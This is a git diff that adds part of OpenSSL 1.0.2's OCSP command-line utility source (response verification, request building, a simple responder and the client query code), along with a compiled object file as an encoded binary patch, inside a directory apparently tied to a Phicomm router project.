+        resp = d2i_OCSP_RESPONSE_bio(derbio, NULL);
+        BIO_free(derbio);
+        if (!resp) {
+            BIO_printf(bio_err, "Error reading OCSP response\n");
+            goto end;
+        }
+
+    } else {
+        ret = 0;
+        goto end;
+    }
+
+ done_resp:
+
+    if (respout) {
+        if (!strcmp(respout, "-"))
+            derbio = BIO_new_fp(stdout, BIO_NOCLOSE);
+        else
+            derbio = BIO_new_file(respout, "wb");
+        if (!derbio) {
+            BIO_printf(bio_err, "Error opening file %s\n", respout);
+            goto end;
+        }
+        i2d_OCSP_RESPONSE_bio(derbio, resp);
+        BIO_free(derbio);
+    }
+
+    i = OCSP_response_status(resp);
+
+    if (i != OCSP_RESPONSE_STATUS_SUCCESSFUL) {
+        BIO_printf(out, "Responder Error: %s (%d)\n",
+                   OCSP_response_status_str(i), i);
+        if (ignore_err)
+            goto redo_accept;
+        ret = 0;
+        goto end;
+    }
+
+    if (resp_text)
+        OCSP_RESPONSE_print(out, resp, 0);
+
+    /* If running as responder don't verify our own response */
+    if (cbio) {
+        if (accept_count > 0)
+            accept_count--;
+        /* Redo if more connections needed */
+        if (accept_count) {
+            BIO_free_all(cbio);
+            cbio = NULL;
+            OCSP_REQUEST_free(req);
+            req = NULL;
+            OCSP_RESPONSE_free(resp);
+            resp = NULL;
+            goto redo_accept;
+        }
+        ret = 0;
+        goto end;
+    } else if (ridx_filename) {
+        ret = 0;
+        goto end;
+    }
+
+    if (!store)
+        store = setup_verify(bio_err, CAfile, CApath);
+    if (!store)
+        goto end;
+    if (vpm)
+        X509_STORE_set1_param(store, vpm);
+    if (verify_certfile) {
+        verify_other = load_certs(bio_err, verify_certfile, FORMAT_PEM,
+                                  NULL, e, "validator certificate");
+        if (!verify_other)
+            goto end;
+    }
+
+    bs = OCSP_response_get1_basic(resp);
+
+    if (!bs) {
+        BIO_printf(bio_err, "Error parsing response\n");
+        goto end;
+    }
+
+    ret = 0;
+
+    if (!noverify) {
+        if (req && ((i = OCSP_check_nonce(req, bs)) <= 0)) {
+            if (i == -1)
+                BIO_printf(bio_err, "WARNING: no nonce in response\n");
+            else {
+                BIO_printf(bio_err, "Nonce Verify error\n");
+                ret = 1;
+                goto end;
+            }
+        }
+
+        i = OCSP_basic_verify(bs, verify_other, store, verify_flags);
+        if (i <= 0) {
+            BIO_printf(bio_err, "Response Verify Failure\n");
+            ERR_print_errors(bio_err);
+            ret = 1;
+        } else
+            BIO_printf(bio_err, "Response verify OK\n");
+
+    }
+
+    if (!print_ocsp_summary(out, bs, req, reqnames, ids, nsec, maxage))
+        ret = 1;
+
+ end:
+    ERR_print_errors(bio_err);
+    X509_free(signer);
+    X509_STORE_free(store);
+    if (vpm)
+        X509_VERIFY_PARAM_free(vpm);
+    EVP_PKEY_free(key);
+    EVP_PKEY_free(rkey);
+    X509_free(issuer);
+    X509_free(cert);
+    X509_free(rsigner);
+    X509_free(rca_cert);
+    free_index(rdb);
+    BIO_free_all(cbio);
+    BIO_free_all(acbio);
+    BIO_free(out);
+    OCSP_REQUEST_free(req);
+    OCSP_RESPONSE_free(resp);
+    OCSP_BASICRESP_free(bs);
+    sk_OPENSSL_STRING_free(reqnames);
+    sk_OCSP_CERTID_free(ids);
+    sk_X509_pop_free(sign_other, X509_free);
+    sk_X509_pop_free(verify_other, X509_free);
+    sk_CONF_VALUE_pop_free(headers, X509V3_conf_free);
+
+    if (thost)
+        OPENSSL_free(thost);
+    if (tport)
+        OPENSSL_free(tport);
+    if (tpath)
+        OPENSSL_free(tpath);
+
+    OPENSSL_EXIT(ret);
+}
+
+static int add_ocsp_cert(OCSP_REQUEST **req, X509 *cert,
+                         const EVP_MD *cert_id_md, X509 *issuer,
+                         STACK_OF(OCSP_CERTID) *ids)
+{
+    OCSP_CERTID *id;
+    if (!issuer) {
+        BIO_printf(bio_err, "No issuer certificate specified\n");
+        return 0;
+    }
+    if (!*req)
+        *req = OCSP_REQUEST_new();
+    if (!*req)
+        goto err;
+    id = OCSP_cert_to_id(cert_id_md, cert, issuer);
+    if (!id || !sk_OCSP_CERTID_push(ids, id))
+        goto err;
+    if (!OCSP_request_add0_id(*req, id))
+        goto err;
+    return 1;
+
+ err:
+    BIO_printf(bio_err, "Error Creating OCSP request\n");
+    return 0;
+}
+
+static int add_ocsp_serial(OCSP_REQUEST **req, char *serial,
+                           const EVP_MD *cert_id_md, X509 *issuer,
+                           STACK_OF(OCSP_CERTID) *ids)
+{
+    OCSP_CERTID *id;
+    X509_NAME *iname;
+    ASN1_BIT_STRING *ikey;
+    ASN1_INTEGER *sno;
+    if (!issuer) {
+        BIO_printf(bio_err, "No issuer certificate specified\n");
+        return 0;
+    }
+    if (!*req)
+        *req = OCSP_REQUEST_new();
+    if (!*req)
+        goto err;
+    iname = X509_get_subject_name(issuer);
+    ikey = X509_get0_pubkey_bitstr(issuer);
+    sno = s2i_ASN1_INTEGER(NULL, serial);
+    if (!sno) {
+        BIO_printf(bio_err, "Error converting serial number %s\n", serial);
+        return 0;
+    }
+    id = OCSP_cert_id_new(cert_id_md, iname, ikey, sno);
+    ASN1_INTEGER_free(sno);
+    if (!id || !sk_OCSP_CERTID_push(ids, id))
+        goto err;
+    if (!OCSP_request_add0_id(*req, id))
+        goto err;
+    return 1;
+
+ err:
+    BIO_printf(bio_err, "Error Creating OCSP request\n");
+    return 0;
+}
+
+static int print_ocsp_summary(BIO *out, OCSP_BASICRESP *bs, OCSP_REQUEST *req,
+                              STACK_OF(OPENSSL_STRING) *names,
+                              STACK_OF(OCSP_CERTID) *ids, long nsec,
+                              long maxage)
+{
+    OCSP_CERTID *id;
+    char *name;
+    int i;
+
+    int status, reason;
+
+    ASN1_GENERALIZEDTIME *rev, *thisupd, *nextupd;
+
+    if (!bs || !req || !sk_OPENSSL_STRING_num(names)
+        || !sk_OCSP_CERTID_num(ids))
+        return 1;
+
+    for (i = 0; i < sk_OCSP_CERTID_num(ids); i++) {
+        id = sk_OCSP_CERTID_value(ids, i);
+        name = sk_OPENSSL_STRING_value(names, i);
+        BIO_printf(out, "%s: ", name);
+
+        if (!OCSP_resp_find_status(bs, id, &status, &reason,
+                                   &rev, &thisupd, &nextupd)) {
+            BIO_puts(out, "ERROR: No Status found.\n");
+            continue;
+        }
+
+        /*
+         * Check validity: if invalid write to output BIO so we know which
+         * response this refers to.
+         */
+        if (!OCSP_check_validity(thisupd, nextupd, nsec, maxage)) {
+            BIO_puts(out, "WARNING: Status times invalid.\n");
+            ERR_print_errors(out);
+        }
+        BIO_printf(out, "%s\n", OCSP_cert_status_str(status));
+
+        BIO_puts(out, "\tThis Update: ");
+        ASN1_GENERALIZEDTIME_print(out, thisupd);
+        BIO_puts(out, "\n");
+
+        if (nextupd) {
+            BIO_puts(out, "\tNext Update: ");
+            ASN1_GENERALIZEDTIME_print(out, nextupd);
+            BIO_puts(out, "\n");
+        }
+
+        if (status != V_OCSP_CERTSTATUS_REVOKED)
+            continue;
+
+        if (reason != -1)
+            BIO_printf(out, "\tReason: %s\n", OCSP_crl_reason_str(reason));
+
+        BIO_puts(out, "\tRevocation Time: ");
+        ASN1_GENERALIZEDTIME_print(out, rev);
+        BIO_puts(out, "\n");
+    }
+
+    return 1;
+}
+
+static int make_ocsp_response(OCSP_RESPONSE **resp, OCSP_REQUEST *req,
+                              CA_DB *db, X509 *ca, X509 *rcert,
+                              EVP_PKEY *rkey, const EVP_MD *rmd,
+                              STACK_OF(X509) *rother, unsigned long flags,
+                              int nmin, int ndays, int badsig)
+{
+    ASN1_TIME *thisupd = NULL, *nextupd = NULL;
+    OCSP_CERTID *cid, *ca_id = NULL;
+    OCSP_BASICRESP *bs = NULL;
+    int i, id_count, ret = 1;
+
+    id_count = OCSP_request_onereq_count(req);
+
+    if (id_count <= 0) {
+        *resp =
+            OCSP_response_create(OCSP_RESPONSE_STATUS_MALFORMEDREQUEST, NULL);
+        goto end;
+    }
+
+    bs = OCSP_BASICRESP_new();
+    thisupd = X509_gmtime_adj(NULL, 0);
+    if (ndays != -1)
+        nextupd = X509_gmtime_adj(NULL, nmin * 60 + ndays * 3600 * 24);
+
+    /* Examine each certificate id in the request */
+    for (i = 0; i < id_count; i++) {
+        OCSP_ONEREQ *one;
+        ASN1_INTEGER *serial;
+        char **inf;
+        ASN1_OBJECT *cert_id_md_oid;
+        const EVP_MD *cert_id_md;
+        one = OCSP_request_onereq_get0(req, i);
+        cid = OCSP_onereq_get0_id(one);
+
+        OCSP_id_get0_info(NULL, &cert_id_md_oid, NULL, NULL, cid);
+
+        cert_id_md = EVP_get_digestbyobj(cert_id_md_oid);
+        if (!cert_id_md) {
+            *resp = OCSP_response_create(OCSP_RESPONSE_STATUS_INTERNALERROR,
+                                         NULL);
+            goto end;
+        }
+        if (ca_id)
+            OCSP_CERTID_free(ca_id);
+        ca_id = OCSP_cert_to_id(cert_id_md, NULL, ca);
+
+        /* Is this request about our CA? */
+        if (OCSP_id_issuer_cmp(ca_id, cid)) {
+            OCSP_basic_add1_status(bs, cid,
+                                   V_OCSP_CERTSTATUS_UNKNOWN,
+                                   0, NULL, thisupd, nextupd);
+            continue;
+        }
+        OCSP_id_get0_info(NULL, NULL, NULL, &serial, cid);
+        inf = lookup_serial(db, serial);
+        if (!inf)
+            OCSP_basic_add1_status(bs, cid,
+                                   V_OCSP_CERTSTATUS_UNKNOWN,
+                                   0, NULL, thisupd, nextupd);
+        else if (inf[DB_type][0] == DB_TYPE_VAL)
+            OCSP_basic_add1_status(bs, cid,
+                                   V_OCSP_CERTSTATUS_GOOD,
+                                   0, NULL, thisupd, nextupd);
+        else if (inf[DB_type][0] == DB_TYPE_REV) {
+            ASN1_OBJECT *inst = NULL;
+            ASN1_TIME *revtm = NULL;
+            ASN1_GENERALIZEDTIME *invtm = NULL;
+            OCSP_SINGLERESP *single;
+            int reason = -1;
+            unpack_revinfo(&revtm, &reason, &inst, &invtm, inf[DB_rev_date]);
+            single = OCSP_basic_add1_status(bs, cid,
+                                            V_OCSP_CERTSTATUS_REVOKED,
+                                            reason, revtm, thisupd, nextupd);
+            if (invtm)
+                OCSP_SINGLERESP_add1_ext_i2d(single, NID_invalidity_date,
+                                             invtm, 0, 0);
+            else if (inst)
+                OCSP_SINGLERESP_add1_ext_i2d(single,
+                                             NID_hold_instruction_code, inst,
+                                             0, 0);
+            ASN1_OBJECT_free(inst);
+            ASN1_TIME_free(revtm);
+            ASN1_GENERALIZEDTIME_free(invtm);
+        }
+    }
+
+    OCSP_copy_nonce(bs, req);
+
+    OCSP_basic_sign(bs, rcert, rkey, rmd, rother, flags);
+
+    if (badsig)
+        bs->signature->data[bs->signature->length - 1] ^= 0x1;
+
+    *resp = OCSP_response_create(OCSP_RESPONSE_STATUS_SUCCESSFUL, bs);
+
+ end:
+    ASN1_TIME_free(thisupd);
+    ASN1_TIME_free(nextupd);
+    OCSP_CERTID_free(ca_id);
+    OCSP_BASICRESP_free(bs);
+    return ret;
+
+}
+
+static char **lookup_serial(CA_DB *db, ASN1_INTEGER *ser)
+{
+    int i;
+    BIGNUM *bn = NULL;
+    char *itmp, *row[DB_NUMBER], **rrow;
+    for (i = 0; i < DB_NUMBER; i++)
+        row[i] = NULL;
+    bn = ASN1_INTEGER_to_BN(ser, NULL);
+    OPENSSL_assert(bn);         /* FIXME: should report an error at this
+                                 * point and abort */
+    if (BN_is_zero(bn))
+        itmp = BUF_strdup("00");
+    else
+        itmp = BN_bn2hex(bn);
+    row[DB_serial] = itmp;
+    BN_free(bn);
+    rrow = TXT_DB_get_by_index(db->db, DB_serial, row);
+    OPENSSL_free(itmp);
+    return rrow;
+}
+
+/* Quick and dirty OCSP server: read in and parse input request */
+
+static BIO *init_responder(const char *port)
+{
+    BIO *acbio = NULL, *bufbio = NULL;
+    bufbio = BIO_new(BIO_f_buffer());
+    if (!bufbio)
+        goto err;
+# ifndef OPENSSL_NO_SOCK
+    acbio = BIO_new_accept(port);
+# else
+    BIO_printf(bio_err,
+               "Error setting up accept BIO - sockets not supported.\n");
+# endif
+    if (!acbio)
+        goto err;
+    BIO_set_accept_bios(acbio, bufbio);
+    bufbio = NULL;
+
+    if (BIO_do_accept(acbio) <= 0) {
+        BIO_printf(bio_err, "Error setting up accept BIO\n");
+        ERR_print_errors(bio_err);
+        goto err;
+    }
+
+    return acbio;
+
+ err:
+    BIO_free_all(acbio);
+    BIO_free(bufbio);
+    return NULL;
+}
+
+static int do_responder(OCSP_REQUEST **preq, BIO **pcbio, BIO *acbio,
+                        const char *port)
+{
+    int have_post = 0, len;
+    OCSP_REQUEST *req = NULL;
+    char inbuf[1024];
+    BIO *cbio = NULL;
+
+    if (BIO_do_accept(acbio) <= 0) {
+        BIO_printf(bio_err, "Error accepting connection\n");
+        ERR_print_errors(bio_err);
+        return 0;
+    }
+
+    cbio = BIO_pop(acbio);
+    *pcbio = cbio;
+
+    for (;;) {
+        len = BIO_gets(cbio, inbuf, sizeof inbuf);
+        if (len <= 0)
+            return 1;
+        /* Look for "POST" signalling start of query */
+        if (!have_post) {
+            if (strncmp(inbuf, "POST", 4)) {
+                BIO_printf(bio_err, "Invalid request\n");
+                return 1;
+            }
+            have_post = 1;
+        }
+        /* Look for end of headers */
+        if ((inbuf[0] == '\r') || (inbuf[0] == '\n'))
+            break;
+    }
+
+    /* Try to read OCSP request */
+
+    req = d2i_OCSP_REQUEST_bio(cbio, NULL);
+
+    if (!req) {
+        BIO_printf(bio_err, "Error parsing OCSP request\n");
+        ERR_print_errors(bio_err);
+    }
+
+    *preq = req;
+
+    return 1;
+
+}
+
+static int send_ocsp_response(BIO *cbio, OCSP_RESPONSE *resp)
+{
+    char http_resp[] =
+        "HTTP/1.0 200 OK\r\nContent-type: application/ocsp-response\r\n"
+        "Content-Length: %d\r\n\r\n";
+    if (!cbio)
+        return 0;
+    BIO_printf(cbio, http_resp, i2d_OCSP_RESPONSE(resp, NULL));
+    i2d_OCSP_RESPONSE_bio(cbio, resp);
+    (void)BIO_flush(cbio);
+    return 1;
+}
+
+static OCSP_RESPONSE *query_responder(BIO *err, BIO *cbio, const char *path,
+                                      const STACK_OF(CONF_VALUE) *headers,
+                                      OCSP_REQUEST *req, int req_timeout)
+{
+    int fd;
+    int rv;
+    int i;
+    OCSP_REQ_CTX *ctx = NULL;
+    OCSP_RESPONSE *rsp = NULL;
+    fd_set confds;
+    struct timeval tv;
+
+    if (req_timeout != -1)
+        BIO_set_nbio(cbio, 1);
+
+    rv = BIO_do_connect(cbio);
+
+    if ((rv <= 0) && ((req_timeout == -1) || !BIO_should_retry(cbio))) {
+        BIO_puts(err, "Error connecting BIO\n");
+        return NULL;
+    }
+
+    if (BIO_get_fd(cbio, &fd) <= 0) {
+        BIO_puts(err, "Can't get connection fd\n");
+        goto err;
+    }
+
+    if (req_timeout != -1 && rv <= 0) {
+        FD_ZERO(&confds);
+        openssl_fdset(fd, &confds);
+        tv.tv_usec = 0;
+        tv.tv_sec = req_timeout;
+        rv = select(fd + 1, NULL, (void *)&confds, NULL, &tv);
+        if (rv == 0) {
+            BIO_puts(err, "Timeout on connect\n");
+            return NULL;
+        }
+    }
+
+    ctx = OCSP_sendreq_new(cbio, path, NULL, -1);
+    if (!ctx)
+        return NULL;
+
+    for (i = 0; i < sk_CONF_VALUE_num(headers); i++) {
+        CONF_VALUE *hdr = sk_CONF_VALUE_value(headers, i);
+        if (!OCSP_REQ_CTX_add1_header(ctx, hdr->name, hdr->value))
+            goto err;
+    }
+
+    if (!OCSP_REQ_CTX_set1_req(ctx, req))
+        goto err;
+
+    for (;;) {
+        rv = OCSP_sendreq_nbio(&rsp, ctx);
+        if (rv != -1)
+            break;
+        if (req_timeout == -1)
+            continue;
+        FD_ZERO(&confds);
+        openssl_fdset(fd, &confds);
+        tv.tv_usec = 0;
+        tv.tv_sec = req_timeout;
+        if (BIO_should_read(cbio))
+            rv = select(fd + 1, (void *)&confds, NULL, NULL, &tv);
+        else if (BIO_should_write(cbio))
+            rv = select(fd + 1, NULL, (void *)&confds, NULL, &tv);
+        else {
+            BIO_puts(err, "Unexpected retry condition\n");
+            goto err;
+        }
+        if (rv == 0) {
+            BIO_puts(err, "Timeout on request\n");
+            break;
+        }
+        if (rv == -1) {
+            BIO_puts(err, "Select error\n");
+            break;
+        }
+
+    }
+ err:
+    if (ctx)
+        OCSP_REQ_CTX_free(ctx);
+
+    return rsp;
+}
+
+OCSP_RESPONSE *process_responder(BIO *err, OCSP_REQUEST *req,
+                                 const char *host, const char *path,
+                                 const char *port, int use_ssl,
+                                 const STACK_OF(CONF_VALUE) *headers,
+                                 int req_timeout)
+{
+    BIO *cbio = NULL;
+    SSL_CTX *ctx = NULL;
+    OCSP_RESPONSE *resp = NULL;
+    cbio = BIO_new_connect(host);
+    if (!cbio) {
+        BIO_printf(err, "Error creating connect BIO\n");
+        goto end;
+    }
+    if (port)
+        BIO_set_conn_port(cbio, port);
+    if (use_ssl == 1) {
+        BIO *sbio;
+        ctx = SSL_CTX_new(SSLv23_client_method());
+        if (ctx == NULL) {
+            BIO_printf(err, "Error creating SSL context.\n");
+            goto end;
+        }
+        SSL_CTX_set_mode(ctx, SSL_MODE_AUTO_RETRY);
+        sbio = BIO_new_ssl(ctx, 1);
+        cbio = BIO_push(sbio, cbio);
+    }
+    resp = query_responder(err, cbio, path, headers, req, req_timeout);
+    if (!resp)
+        BIO_printf(bio_err, "Error querying OCSP responder\n");
+ end:
+    if (cbio)
+        BIO_free_all(cbio);
+    if (ctx)
+        SSL_CTX_free(ctx);
+    return resp;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ocsp.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ocsp.o
new file mode 100644
index 0000000000000000000000000000000000000000..f1dbca5c2dd65efdc9bcca0164680cf96880aa61
GIT binary patch
literal 43896
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
